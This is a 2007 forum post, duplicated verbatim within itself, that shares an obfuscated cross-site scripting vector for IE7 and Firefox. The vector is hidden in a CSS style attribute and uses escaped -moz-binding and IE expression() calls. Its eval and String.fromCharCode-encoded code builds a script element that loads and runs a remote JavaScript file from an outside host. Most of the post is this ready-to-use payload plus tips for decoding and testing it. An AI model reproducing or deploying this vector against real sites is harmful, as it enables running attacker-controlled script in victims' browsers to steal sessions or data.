Fugitif
26.11.2007, 23:32
Ultimate XSS CSS injection
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);" id="inject">test</div>
You can use Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.
More:
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/
Here’s a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.
<div style="\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs
\/xbl\/xbl\.xml\#xss);xx: e\
xp\re\s\s\
i\o\n((win
dow.r!=1) 
? eval('x=
String.fro
mCharCode;
scr=docume
nt.createE
lement(x(1
15,99,114,
105,112,11
6));scr.se
tAttribute
(x(115,114
,99),x(104
,116,116,1
12,58,47,4
7,98,117,1
15,105,110
,101,115,1
15,105,110
,102,111,4
6,99,111,4
6,117,107,
47,108,97,
98,115,47,
120,115,11
5,47,120,1
15,115,46,
106,115));
document.g
etElementB
yId(x( 105
,110,106,1
01,99,116 
)).appendC
hild(scr);
window.r=1
;') : 1);" id="inject">test</div>
You can use Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.
More:
http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/